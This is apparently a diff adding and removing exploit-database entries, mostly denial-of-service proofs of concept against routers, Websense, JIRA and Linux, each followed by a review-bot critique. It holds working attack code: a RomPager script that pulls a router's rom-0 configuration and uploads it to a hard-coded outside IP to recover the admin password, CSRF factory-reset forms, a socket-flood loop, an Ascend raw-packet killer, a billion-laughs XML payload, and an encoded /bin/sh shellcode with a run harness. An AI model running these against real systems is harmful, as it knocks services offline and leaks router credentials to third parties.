time.sleep(4)
if banner == 'Copyright':
print '[+] Default password is being used'
dos(host, defaultpass)
else:
print '[!] Default Password is not being used'
while True:
msg = str(raw_input('[?] Decrypt the rom-0 file locally? ')).lower()
try:
if msg[0] == 'y':
password = decodePasswordLocal(host)
print '[*] Router password is: ' +password
dos(host, password)
break
if msg[0] == 'n':
password = decodePasswordRemote(host)
print '[*] Router password is: ' +password
dos(host, password)
break
else:
print '[!] Enter a valid choice'
except Exception, e:
print e
continue
def decodePasswordRemote(host):
fname = 'rom-0'
if os.path.isfile(fname) == True:
os.remove(fname)
urllib.urlretrieve ("http://"+host+"/rom-0", fname)
# If this URL goes down you might have to find one and change this function.
# You can also use the local decoder. It might have few errors in getting output.
url = 'http://198.61.167.113/zynos/decoded.php' # Target URL
files = {'uploadedfile': open('rom-0', 'rb') } # The rom-0 file we wanna upload
data = {'MAX_FILE_SIZE': 1000000, 'submit': 'Upload rom-0'} # Additional Parameters we need to include
headers = { 'User-agent' : 'Python Demo Agent v1' } # Any additional Headers you want to send or include
res = requests.post(url, files=files, data=data, headers=headers, allow_redirects=True, timeout=30.0, verify=False )
res1 =res.content
p = re.search('rows=10>(.*)', res1)
if p:
passwd = found = p.group(1)
else:
password = 'NotFound'
return passwd
def decodePasswordLocal(host):
# Sometimes this might output a wrong password while finding the exact string.
# print the result as mentioned below and manually find out
fname = 'rom-0'
if os.path.isfile(fname) == True:
os.remove(fname)
urllib.urlretrieve ("http://"+host+"/rom-0", fname)
fpos=8568
fend=8788
fhandle=file('rom-0')
fhandle.seek(fpos)
chunk="*"
amount=221
while fpos < fend:
if fend-fpos < amount:
amount = amount
data = fhandle.read(amount)
fpos += len(data)
reader = BitReader(data)
result = ''
window = RingList(2048)
while True:
bit = reader.getBit()
if not bit:
char = reader.getByte()
result += chr(char)
window.append(char)
else:
bit = reader.getBit()
if bit:
offset = reader.getBits(7)
if offset == 0:
break
else:
offset = reader.getBits(11)
lenField = reader.getBits(2)
if lenField < 3:
lenght = lenField + 2
else:
lenField <<= 2
lenField += reader.getBits(2)
if lenField < 15:
lenght = (lenField & 0x0f) + 5
else:
lenCounter = 0
lenField = reader.getBits(4)
while lenField == 15:
lenField = reader.getBits(4)
lenCounter += 1
lenght = 15*lenCounter + 8 + lenField
for i in xrange(lenght):
char = window[-offset]
result += chr(char)
window.append(char)
result = filter_non_printable(result).decode('unicode_escape').encode('ascii','ignore')
# In case the password you see is wrong while filtering, manually print it from here and findout.
#print result
if 'TP-LINK' in result:
result = ''.join(result.split()).split('TP-LINK', 1)[0] + 'TP-LINK';
result = result.replace("TP-LINK", "")
result = result[1:]
if 'ZTE' in result:
result = ''.join(result.split()).split('ZTE', 1)[0] + 'ZTE';
result = result.replace("ZTE", "")
result = result[1:]
if 'tc160' in result:
result = ''.join(result.split()).split('tc160', 1)[0] + 'tc160';
result = result.replace("tc160", "")
result = result[1:]
return result
def regex(path, text):
match = re.search(path, text)
if match:
return match.group()
else:
return None
def main():
if sys.platform == 'win32':
os.system('cls')
else:
os.system('clear')
try:
print banner()
print '''
|=--------=[ ZTE and TP-Link RomPager Denial of Service Exploit ]=-------=|\n
[*] Author: Osanda Malith Jayathissa
[*] Follow @OsandaMalith
[!] Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
[!] Author takes no responsibility for any kind of damage you cause.
'''
parser = optparse.OptionParser("usage: %prog -i <IP Address> ")
parser.add_option('-i', dest='host',
type='string',
help='Specify the IP to attack')
(options, args) = parser.parse_args()
if options.host is None:
parser.print_help()
exit(-1)
host = options.host
x = checkHost(host)
if x == 0:
print '[+] The host is up and running'
server = checkServer(host)
if server == 0:
checkPassword(host)
else:
print ('[!] Sorry the router is not running RomPager')
else:
print '[!] The host is not up and running'
sys.exit(0)
except KeyboardInterrupt:
print '[!] Ctrl + C detected\n[!] Exiting'
sys.exit(0)
except EOFError:
print '[!] Ctrl + D detected\n[!] Exiting'
sys.exit(0)
if __name__ == "__main__":
main()
#EOF
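Review bot: `decodePasswordRemote` downloads the target's `rom-0` (the configuration dump holding the admin password) and uploads it to a hard-coded third-party host, `http://198.61.167.113/zynos/decoded.php`; whoever runs this hands the device configuration to whoever controls that IP, and the comment even anticipates the URL changing ("If this URL goes down you might have to find one"). This needs to be stated in the header, and the local decoder should be the default path. The same function also breaks on the not-found branch: it assigns `password = 'NotFound'` but returns `passwd`, which is unbound there, so the caller gets a `NameError` instead of the sentinel. In `dos`, the `sys.exit(0)` inside the `try` is swallowed by the bare `except:` (Python 2 catches `SystemExit` there), so a normal HTTP response never exits and control falls into the ping check; use `except Exception` and handle the response explicitly. `if fend-fpos < amount: amount = amount` in `decodePasswordLocal` is a no-op, and `lenght` throughout should be `length`.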

@ -0,0 +1,30 @@
# Title : Sagem F@st 3304-V1 denial of service Vulnerability
# Vendor Homepage : http://www.sagemcom.com
# Tested on : Firefox, Google Chrome
# Tested Router : Sagem F@st 3304-V1
# Date : 2014-07-26
# Author : Z3ro0ne
# Contact : saadousfar59@gmail.com
# Facebook Page : https://www.facebook.com/Z3ro0ne
# Vulnerability description :
the Vulnerability allow unauthenticated users to remotely restart and reset the router
# Exploit:
<html>
<title>SAGEM FAST3304-V1 DENIAL OF SERVICE</title>
<body>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
<INPUT TYPE="SUBMIT" VALUE="REBOOT ROUTER">
</FORM>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
<INPUT TYPE="SUBMIT" VALUE="FACTORY RESET">
</FORM>
</body>
</html>
Reset to factory configuration :
--- Using Google Chrome browser :
to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar
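Review bot: both forms submit to the identical `ACTION=R%E9tablir+la+configuration+initiale` URL (French for "restore the initial configuration"), so the button labelled "REBOOT ROUTER" performs a factory reset, not a reboot; either supply the distinct reboot action the description claims exists or remove the mislabelled form. The closing paragraph then repeats the same URL a third time. "Tested on: Firefox, Google Chrome" describes the browser, not the device; add the router firmware version, since that is what an administrator would check against.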

platforms/hardware/dos/34203.txt Executable file, 112 lines
@ -0,0 +1,112 @@
Exploit Title: Dlink DWR-113 Rev. Ax - CSRF causing Denial of Service
Google dork : N/A
Exploit Author: Blessen Thomas
Date : 29/07/14
Vendor Homepage : http://www.dlink.com/
Software Link : N/A
Firmware version: v2.02 2013-03-13
Tested on : Windows 7
CVE : CVE-2014-3136
Type of Application : Web application
Release mode : Coordinated disclosure
Vulnerability description:
It was observed that the D-link DWR-113 wireless router is vulnerable to
denial of service attack via CSRF(Cross-Site Request Forgery) vulnerability.
An attacker could craft a malicious CSRF exploit to change the password in
the password functionality when the user(admin) is logged in to the
application ,as the user interface (admin panel) lacks the csrf token or
nonce to prevent an attacker to change the password.
As a result, as soon as the crafted malicious exploit is executed the
router is rebooted and the user could not login thus forcing to reset the
routers device physically ,leading to a denial of service condition.
POC code (exploit) :
*Restart Router by CSRF*
<html>
<!-- CSRF PoC --->
<body>
<form action="http://192.168.0.1/rebo.htm">
<input type="hidden" name="S00010002" value="test" />
<input type="hidden" name="np2" value="test" />
<input type="hidden" name="N00150004" value="0" />
<input type="hidden" name="N00150001" value="" />
<input type="hidden" name="N00150003" value="1080" />
<input type="hidden" name="_cce" value="0x80150002" />
<input type="hidden" name="_sce" value="%Ssc" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Tools used :
Mozilla firefox browser v28.0 , Burp proxy free edition v1.5
Timeline :
06-04-14 : Contacted Vendor with details of Vulnerability and Exploit.
06-04-14 : Vendor D-Link forwards to R&D team for review
29-04-14 : Vendor contacted to know the status.
01-05-14 : Vendor acknowledged and released a patch
01-05-14 : CVE ID provided by Mitre team.
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10034
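Review bot: the description and the PoC do not match: the prose describes a CSRF that changes the admin password, while the form posts to `/rebo.htm` with fixed hidden fields and the outcome described ("the router is rebooted and the user could not login") reads as a forced reboot plus loss of access, not a credential change. Describe what the posted form actually does, or retitle the entry to match. Minor: the HTML comment `<!-- CSRF PoC --->` has a stray hyphen, and the timeline uses DD-MM-YY while the Date field uses DD/MM/YY.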

@ -0,0 +1,57 @@
TP-Link TL-WR740N Wireless Router MitM httpd Denial Of Service
Vendor: TP-LINK Technologies Co., Ltd.
Product web page: http://www.tp-link.us
Affected version:
- Firmware version: 3.17.0 Build 140520 Rel.75075n (Released: 5/20/2014)
- Firmware version: 3.16.6 Build 130529 Rel.47286n (Released: 5/29/2013)
- Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013)
- Hardware version: WR740N v4 00000000 (v4.23)
- Model No. TL-WR740N / TL-WR740ND
Summary: The TL-WR740N is a combined wired/wireless network connection
device integrated with internet-sharing router and 4-port switch. The
wireless N Router is 802.11b&g compatible based on 802.11n technology
and gives you 802.11n performance up to 150Mbps at an even more affordable
price. Bordering on 11n and surpassing 11g speed enables high bandwidth
consuming applications like video streaming to be more fluid.
Desc: The TP-Link WR740N Wireless N Router network device is exposed to a
denial of service vulnerability when processing a HTTP GET request. This
issue occurs when the web server (httpd) fails to handle a HTTP GET request
over a given default TCP port 80. Resending the value 'new' to the 'isNew'
parameter in 'PingIframeRpm.htm' script to the router thru a proxy will
crash its httpd service denying the legitimate users access to the admin
control panel management interface. To bring back the http srv and the
admin UI, a user must physically reboot the router.
Tested on: Router Webserver
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5210
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5210.php
13.11.2014
---
Replay
GET /userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&lineNum=1 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
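Review bot: the replayed request carries an `Authorization: Basic ...` header, so the crash is triggered from an authenticated session, yet the Desc paragraph never says so and "Tested on: Router Webserver" names no firmware build for the test. State the authentication precondition explicitly, since it decides whether the exposure is "anyone on the LAN" or "anyone holding admin credentials", which is the practical question for the router's owner and for anyone deciding whether changing the default password is a sufficient mitigation. "over a given default TCP port 80" and "thru a proxy" also read awkwardly; the relevant detail is that the request is replayed through an intercepting proxy, and that should be said plainly.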

platforms/hardware/dos/9980.txt Executable file, 127 lines
@ -0,0 +1,127 @@
_________________________________________
Security Advisory NSOADV-2009-002
_________________________________________
_________________________________________
Title: Websense Email Security Web Administrator DoS
Severity: Low
Advisory ID: NSOADV-2009-002
Found Date: 28.09.2009
Date Reported: 01.10.2009
Release Date: 20.10.2009
Author: Nikolas Sotiriu
Mail: nso-research (at) sotiriu.de
URL: http://sotiriu.de/adv/NSOADV-2009-002.txt
Vendor: Websense (http://www.websense.com/)
Affected Products: Websense Email Security v7.1
Personal Email Manager v7.1
Not Affected Products: Websense Email Security v7.1 Hotfix 4
Personal Email Manager v7.1 Hotfix 4
Remote Exploitable: Yes
Local Exploitable: Yes
Patch Status: Patched with Hotfix 4
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: for the permission to use his
Policy
Background:
===========
Websense Email Security software incorporates multiple layers of
real-time Web security and data security intelligence to provide
leading email protection from converged email and Web 2.0 threats.
It helps to manage outbound data leaks and compliance risk, and enables
a consolidated security strategy with the trusted leader in Essential
Information Protection.
(Product description from Websense Website)
The Websense Email Security Web Administrator is a webfrontend, which
enables you to access the message administration, directory management
and to view the log.
Description:
============
The Web Administrator frontend (STEMWADM.EXE) listens by default on port
TCP/8181.
If an attacker sends a HTTP Request to port 8181 without waiting for a
response the webserver crashes. The proof of concept script just sends
a "GET /index.asp" and closes the socket. The server can not response
to the request anymore and dies.
By default the service will always restart after a crash. So the poc
will send the request until it will be stopped.
Proof of Concept :
==================
#!/usr/bin/perl
use Socket;
(($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 ",
"<target> <port> \n";
print "\nThe Webserver on http://$target:$port should be dead until",
"this script is running\n";
while (1) {
$ip = inet_aton($target) || die "host($target) not found.\n";
$sockaddr = pack_sockaddr_in($port, $ip);
socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.\n";
connect(SOCKET, $sockaddr) || die "connect $target $port error.\n";
print SOCKET "GET /index.asp";
print "Request sent ...\n";
close(SOCKET);
sleep 1;
};
Solution:
=========
Vendor released a patch.
http://tinyurl.com/yhe3hqa
Disclosure Timeline (YYYY/MM/DD):
=================================
2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP Key
2009.10.01: Websense sent there PGP Key
2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure
date to Vendor
2009.10.08: Websense was not able to reproduce the DoS Problem
2009.10.08: Sent a mail with more explanation
2009.10.13: Websense verifies the finding and fixed it. The path will be
available in Version 7.2 which will be released in ~2 weeks
2009.10.13: Ask for a list of affected versions/products and changed the
release date to 2009.10.29.
(no response)
2009.10.20: Found the KB article and the Hotfix on Websense website
2009.10.20: Release of this advisory
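Review bot: the Solution section points to `http://tinyurl.com/yhe3hqa` rather than the vendor KB article the timeline says was found on the Websense site; link shorteners rot and hide the destination, so cite the Websense URL and the Hotfix 4 article directly. Header: "Local Exploitable: Yes" is doubtful for a bug in a network listener reached only over TCP/8181; "Remote Exploitable: Yes" on its own is accurate. Timeline typos: "Websense sent there PGP Key" (their), "The path will be available in Version 7.2" (patch). In the PoC, `while (1) { ... };` carries a stray semicolon after the block.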

@ -1,180 +0,0 @@
source: http://www.securityfocus.com/bid/1855/info
A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack.
Note that 3Com is reportedly also vulnerable, but it is not verified which versions of IOS are exploitable.
/* Update, 3/20/98: Ascend has released 5.0Ap46 which corrects this bug.
* see ftp.ascend.com.
*/
/*
* Ascend Kill II - C version
*
* (C) 1998 Rootshell - http://www.rootshell.com/
*
* Released: 3/16/98
*
* Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues
* (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
*
* Sends a specially constructed UDP packet on the discard port (9)
* which cause Ascend routers to reboot. (Warning! Ascend routers will
* process these if they are broadcast packets.)
*
* Compiled under RedHat 5.0 with glibc.
*
* NOTE: This program is NOT to be used for malicous purposes. This is
* intenteded for educational purposes only. By using this program
* you agree to use this for lawfull purposes ONLY.
*
* It is worth mentioning that Ascend has known about this bug for quite
* some time.
*
* Fix:
*
* Filter inbound UDP on port 9.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <linux/udp.h>
#include <netdb.h>
#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }
/* This magic packet was taken from the Java Configurator */
char ascend_data[] =
{
0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
0x50, 0x41, 0x53, 0x53};
unsigned short
in_cksum (addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
int
sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport)
struct sockaddr_in *sin;
unsigned short int s, datalen, sport, dport;
unsigned long int saddr, daddr;
char *data;
{
struct iphdr ip;
struct udphdr udp;
static char packet[8192];
char crashme[500];
int i;
ip.ihl = 5;
ip.version = 4;
ip.tos = rand () % 100;;
ip.tot_len = htons (28 + datalen);
ip.id = htons (31337 + (rand () % 100));
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_UDP;
ip.check = 0;
ip.saddr = saddr;
ip.daddr = daddr;
ip.check = in_cksum ((char *) &ip, sizeof (ip));
udp.source = htons (sport);
udp.dest = htons (dport);
udp.len = htons (8 + datalen);
udp.check = (short) 0;
memcpy (packet, (char *) &ip, sizeof (ip));
memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen);
/* Append random garbage to the packet, without this the router
will think this is a valid probe packet and reply. */
for (i = 0; i < 500; i++)
crashme[i] = rand () % 255;
memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500);
return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0,
(struct sockaddr *) sin, sizeof (struct sockaddr_in)));
}
unsigned int
lookup (host)
char *host;
{
unsigned int addr;
struct hostent *he;
addr = inet_addr (host);
if (addr == -1)
{
he = gethostbyname (host);
if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
return 0;
bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
}
return (addr);
}
void
main (argc, argv)
int argc;
char **argv;
{
unsigned int saddr, daddr;
struct sockaddr_in sin;
int s, i;
if (argc != 3)
errs ("Usage: %s <source_addr> <dest_addr>\n", argv[0]);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err ("Unable to open raw socket.\n");
if (!(saddr = lookup (argv[1])))
err ("Unable to lookup source address.\n");
if (!(daddr = lookup (argv[2])))
err ("Unable to lookup destination address.\n");
sin.sin_family = AF_INET;
sin.sin_port = 9;
sin.sin_addr.s_addr = daddr;
if ((sendpkt_udp (&sin, s, &ascend_data, sizeof (ascend_data), saddr, daddr, 9, 9)) == -1)
{
perror ("sendpkt_udp");
err ("Error sending the UDP packet.\n");
}
}
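Review bot: this hunk removes the file outright (`@ -1,180 +0,0 @@`) with nothing in the change saying why; if it is being dropped as a duplicate, a misfiled entry or a superseded PoC, the replacement id or the reason should be recorded. For the record, the removed text was internally inconsistent and should not be restored as-is: the description says an invalid zero-length TCP packet to the administration port causes the crash, while the code comment, `sin.sin_port = 9` and `sendpkt_udp(..., 9, 9)` send a UDP datagram to the discard port. The code also has a portability bug in `lookup()`: `bcopy(*(he->h_addr_list), &(addr), sizeof (he->h_addr_list))` copies `sizeof(char **)` bytes into a 4-byte `unsigned int`, which overruns `addr` on a 64-bit build; it should copy `he->h_length` (or `sizeof(addr)`) bytes.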

53
platforms/jsp/dos/37218.txt Executable file
@ -0,0 +1,53 @@
source: http://www.securityfocus.com/bid/53595/info
JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data.
Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application.
The following versions are affected:
Versions prior to JIRA 5.0.1 are vulnerable.
Versions prior to Gliffy 3.7.1 are vulnerable.
Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable.
POST somehost.com HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 1577
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com">
<soapenv:Header/>
<soapenv:Body>
<urn:authenticateApplication>
<urn:in0>
<aut:credential>
<aut:credential>stuff1</aut:credential>
<aut:encryptedCredential>?&lol9;</aut:encryptedCredential>
</aut:credential>
<aut:name>stuff3</aut:name>
<aut:validationFactors>
<aut:ValidationFactor>
<aut:name>stuff4</aut:name>
<aut:value>stuff5</aut:value>
</aut:ValidationFactor>
</aut:validationFactors>
</urn:in0>
</urn:authenticateApplication>
</soapenv:Body>
</soapenv:Envelope>
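Review bot: the request line `POST somehost.com HTTP/1.1` is not a valid HTTP request target; it needs the path of the SOAP endpoint the DTD is posted to (`POST /<service-path> HTTP/1.1`, with the `Host: somehost.com` header as already given), and the file nowhere states which path that is, so the advisory cannot be reproduced from it. Also check that `Content-Length: 1577` equals the byte length of the body as committed; a change of line endings during import alters it, and a wrong length makes the server wait for more data instead of parsing the entity expansion. A one-line comment that `&lol9;` expands to 10^9 copies of `lol` (the 'billion laughs' pattern) would make the DoS mechanism explicit for readers.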

@ -0,0 +1,146 @@
Custom shellcode encoder/decoder that switches between byte ROR and byte ROL
1. Update eRORoROL-encoder.py with your shellcode
2. Run eRORoROL-encoder.py
3. Copy output from eRORoROL-encoder.py and update eRORoROL-decoder.nasm
4. Run eRORoROL_compile.sh
-----eRORoROL-encoder.py BEGIN CODE-----
#!/usr/bin/python
# Python Custom Encoding eRORoROL
# Author: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
# Description: If index number is Even do a ROR, else do a ROL
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
format_slash_x = ""
format_0x = ""
counter = 0
max_bits = 8
offset = 1
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
rol = lambda val, r_bits, max_bits: \
(val << r_bits%max_bits) & (2**max_bits-1) | \
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
print "Shellcode encryption started ..."
for x in bytearray(shellcode):
#go through all hexadecimal values
counter += 1
print "[i] Counter: "+str(counter)
print "[i] Instruction in hex: "+ hex(x)
print "[i] Instruction in decimal: "+ str(x)
if counter%2==0: #check if index number is odd or even
print "[i] EVEN index, therefore do ROR"
rox_encoded_instruction = ror(x, offset, max_bits)
else:
print "[i] ODD index therefore do ROL"
rox_encoded_instruction = rol(x, offset, max_bits)
encoded_instruction_in_hex = '%02x' % rox_encoded_instruction
print "[i] Encoded instruction in hex: "+encoded_instruction_in_hex +"\n"
#Beautify with 0x and comma
format_0x += '0x'
format_0x += encoded_instruction_in_hex+","
print "\n[+] Shellcode custom encoding done"
print "\n[i] Initial shellcode length: %d" % len(bytearray(shellcode))
length_format_0x = format_0x.count(',')
print "[i] Encoded format 0x Length: %d" % length_format_0x
print "[i] Encoded format 0x:\t"+ format_0x
if "0x0," in format_0x: print "\n[!] :( WARNING: Output shellcode contains NULL byte(s), consider re-encoding with different offset."
else: print "\n[i] :) Good to go, no NULL bytes detected in output"
print "\n[i] Done!"
-----eRORoROL-encoder.py END CODE-----
-----eRORoROL-decoder.nasm BEGIN CODE-----
; Title: eRORoROL-decoder.nasm
; Author: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
; Description: If index number is Even do a ROR, else do a ROL
global _start
section .text
_start:
jmp short call_shellcode
decoder:
pop esi ;shellcode on ESI
xor ecx,ecx ;our loop counter
mov cl, shellcode_length ;mov cl, 25;shellcode_length 25 bytes
check_even_odd:
test si, 01h ;perform (si & 01h) discarding the result but set the eflags
;set ZF to 1 if (the least significant bit of SI is 0)
;EVEN: if_least_significant_bit_of_SI_is_0 AND 01h: result is 0 then ZF=0)
;ODD: if_least_significant_bit_of_SI_is_1 AND 01h: result is 1 then ZF=1)
je even_number ;if SI==0 then the number is even
;else execute the odd number section
odd_number:
rol byte [esi], 0x1 ;rol decode with 1 offset
jmp short inc_dec
even_number:
ror byte [esi], 0x1 ;ror decode with 1 offset
inc_dec:
inc esi ;next instruction in the encoded shellcode
loop check_even_odd ;loop uses ECX for counter
jmp short shellcode
call_shellcode:
call decoder
shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01
shellcode_length equ $-shellcode
-----eRORoROL-decoder.nasm END CODE-----
-----eRORoROL_compile.sh BEGIN CODE-----
#!/bin/bash
echo '[+] Assembling with Nasm ... '
nasm -f elf32 -o $1.o $1.nasm
echo '[+] Linking ...'
ld -melf_i386 -o $1 $1.o
echo '[+] Dumping shellcode ...'
echo '' > shellcode.nasm
for i in `objdump -d $1 | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" >> shellcode.nasm; done
echo '[+] Creating new shellcode.c ...'
cat > shellcode.c <<EOF
#include<stdio.h>
#include<string.h>
unsigned char code[] ="\\
EOF
echo -n "\\" >> shellcode.c
cat shellcode.nasm >> shellcode.c
cat >> shellcode.c <<EOF
";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
EOF
echo '[+] Compiling shellcode.c ...'
gcc -fno-stack-protector -z execstack -m32 -o shellcode shellcode.c
echo '[+] Done! Run ./shellcode to execute!'
-----eRORoROL_compile.sh END CODE-----
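Review bot: the encoder and the decoder do not agree on what 'even' means. `eRORoROL-encoder.py` keys the direction on the 1-based byte index (`counter%2==0` gives ROR, else ROL), but the decoder keys it on the low bit of the buffer address (`test si, 01h` / `je even_number`), so the decoded output is correct only when the encoded bytes happen to start at an even address; loaded at an odd address, every byte is rotated the wrong way. Use a parity that is independent of the address (a running index in a spare register, or a flag toggled with `xor` each iteration) so the stub is position-independent, which is the point of an encoder. The ZF comments are inverted as well: an `and` that yields 0 sets ZF=1, so `je even_number` is taken when the low bit is 0, the opposite of what `EVEN: ... then ZF=0` / `ODD: ... then ZF=1` say. In the encoder, the NULL-byte warning can never fire: bytes are formatted with `'%02x'`, so a zero byte appears as `0x00,`, which does not contain the substring `0x0,` that the check looks for; test for `"0x00,"` instead. Minor: `mov cl, shellcode_length` limits the payload to 255 bytes, and `ror`/`rol byte [esi]` writes into `section .text`, so the ELF produced by `ld` in `eRORoROL_compile.sh` will fault on the first write unless linked with a writable text segment (`ld -N`); the script only runs the C harness, but a comment would stop readers from trying `./$1` directly.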

31
platforms/linux/dos/10022.c Executable file
@ -0,0 +1,31 @@
int main(void)
{
int ret;
int csd;
int lsd;
struct sockaddr_un sun;
/* make an abstruct name address (*) */
memset(&sun, 0, sizeof(sun));
sun.sun_family = PF_UNIX;
sprintf(&sun.sun_path[1], "%d", getpid());
/* create the listening socket and shutdown */
lsd = socket(AF_UNIX, SOCK_STREAM, 0);
bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
listen(lsd, 1);
shutdown(lsd, SHUT_RDWR);
/* connect loop */
alarm(15); /* forcely exit the loop after 15 sec */
for (;;) {
csd = socket(AF_UNIX, SOCK_STREAM, 0);
ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
if (-1 == ret) {
perror("connect()");
break;
}
puts("Connection OK");
}
return 0;
}
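Review bot: the file does not compile as committed: it uses `socket`, `bind`, `listen`, `shutdown`, `connect`, `struct sockaddr_un`, `memset`, `sprintf`, `getpid`, `alarm`, `perror` and `puts` with no `#include` lines at all, and `SHUT_RDWR` needs `<sys/socket.h>`. Add `<stdio.h>`, `<string.h>`, `<unistd.h>`, `<sys/socket.h>` and `<sys/un.h>`. Unlike the sibling entries it also carries no `source:` line, title or affected-version note, so a reader cannot tell which kernels the connect loop against a shut-down listening socket is meant to hang, and the `(*)` in `/* make an abstruct name address (*) */` points at a footnote that is not in the file. Leaving each `csd` unclosed on every iteration looks intentional (descriptor pressure), but say so in a comment if it is.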

55
platforms/linux/dos/19075.c Executable file
@ -0,0 +1,55 @@
source: http://www.securityfocus.com/bid/83/info
